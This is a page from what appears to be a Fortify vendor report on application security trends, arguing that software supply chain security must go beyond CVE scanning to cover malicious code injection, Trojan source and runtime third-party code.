3/11
  • Pages
  • Editions
01 Home Page
02 Introduction
03 Securing the Software Supply Chain
04 API Security Needs Are Growing Ever Larger
05 AppSec Is Evolving from Shift-Left to Shift Everywhere
06 Cloud-Native AppSec
07 AppSec Orchestration and Correlation
08 Next-Generation DAST
09 Machine Learning and AI Are Key to the Next Evolution of Automation
10 Conclusion
11 About Fortify

Securing the Software Supply Chain

Supply chains have many blind spots or cracks that attackers can take advantage of, resulting in increased severity and frequency of attacks.

In recent years, the severity and frequency of software supply chain attacks have increased significantly. Utilizing open-source components to accelerate the development process has proven to have great advantages, which is why a staggering 98% of all code bases rely on them. However, supply chains have many blind spots or cracks that attackers can take advantage of.

%

of all code bases relied on open-source components

%

increase in supply chain attacks in 2021

205 days on average to patch

Some of the most recent software supply chain attacks, Log4J and SolarWinds, received wide press coverage, causing government and businesses to respond by scrutinizing their supply chains and putting in place the required processes to protect against risk. However, there are many emerging threats beyond software composition analysis, such as insider threat analysis (malicious code injection), insecure compilation (Trojan source), and Hacker Level Insights (third-party client-side JavaScript downloaded and executed at runtime in the browser).

For example, normal vulnerable components can create an exposure as soon as you put that software into production. Traditional composition analysis, which is done after development but before deployment, is an effective defense in this scenario. However, problems with malware components can do a lot of harm on the developer workstation itself.

Software composition analysis isn’t an effective defense for such an attack. You'll need traditional anti-malware software instead.

Future supply chain security will move beyond CVE scanning of the software you consume. It will encompass attack vectors such as malicious code injected in the source code you develop; the integrity of the code as it moves through the SDLC; the infrastructure driving deployment and operation; and the range of third-party code, components, and interfaces that your software interacts with at runtime. Equally important will be the ability to proactively find/select the best/most secure open-source code for whatever application you build.

Up next:

API Security Needs Are Growing Ever Larger